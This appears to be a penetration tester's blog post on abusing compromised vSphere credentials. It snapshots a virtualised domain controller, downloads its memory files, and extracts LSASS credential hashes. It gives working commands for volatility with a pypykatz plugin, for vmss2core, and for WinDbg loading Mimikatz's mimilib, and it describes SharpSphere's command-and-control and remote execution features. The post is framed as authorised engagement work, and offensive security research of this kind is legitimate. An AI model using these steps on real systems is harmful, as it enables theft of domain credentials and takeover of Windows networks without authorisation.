Exploiting VSphere credentials in 2023
Published at Feb 16, 2023 - 07:55 AM
I've had a couple of engagements where I've ended up with VSphere credentials, logged in, and found that all the windows servers, including the domain controller, are virtualised hosts within VSphere.
SharpSphere provides quite a few functions:
- Command & Control - In combination with F-Secure's C3, SharpSphere provides C&C into VMs using VMware Tools, with no direct network connectivity to the target VM required.
- Code Execution - Allows arbitrary commands to be executed in the guest OS and returns the result
- File Upload - Allows arbitrary files to be uploaded to the guest OS
- File Download - Allows arbitrary files to be downloaded from the guest OS
- List VMs - Lists the VMs managed by vCenter that have VMware Tools running
And finally, the one piece of functionality we actually want to do manually:
- Dump Memory - Dump and download a VM's memory
If we can dump the memory of a running windows machine, logically the memory of the LSASS process is contained somewhere within that memory.
Using VSphere to snapshot Memory
Snapshot and download the .vmem
and .vmsn
files.
Dumping LSASS from the memory dump
There are some good blog posts on this part already123 but I find they
miss just enough that you can get stumped with some weird error. Normally I
would love to sit on my Linux system to do this, but volatility and the
pypykatz-volatility3
plugin breaks often. If you do still want to
go down that road though… I have updated the plugin for it:
See https://github.com/f3rn0s/pypykatz-volatility3 for the updated version. In this repo I've included two slightly different versions of the plugin that are designed to dump LSASS. You can use these plugins like so:
$ vol -p "$(pwd)/pypykatz-volatility3" -f corp-dc01.vmem vol_pypykatz
$ vol -p "$(pwd)/pypykatz-volatility3" -f corp-dc01.vmem vol_shortkatz
The main difference between the two versions is that vol_shortkatz
just prints
out NT and LM hashes (which is normally all I need during a test)
whereas vol_pypykatz
prints all the details.
Just be aware that sometimes volatility can fail, but WinDbg is a pretty sure-fire method.
Setting up windows
You can get the vmss2core utility from here: https://flings.vmware.com/vmss2core
We can use it to create a core dump from the memory file:
./vmss2core.exe -W8 ./corp-dc01.vmsn ./corp-dc01.vmem
And the x64 version of WinDbg you need from here (Link courtesy of 1): Link
We also want to grab a copy Mimikatz which includes a small dll, called mimilib, designed to be loaded into WinDbg.
If the symbols don't exist on your system then you need to run the following commands after loading up the file:
.symfix
.reload /o /f nt
These commands will set WinDbg to download the offsets/symbols directly from Microsoft as needed.
We can then do as the Mimikatz guides:
.load C:\Tools\Mimikatz\x64\mimilib.dll
!process 0 0 lsass.exe
.process /r /p EPROCESS_ADDR //EPROCESS_ADDR is after PROCESS in the previous commands output
!mimikatz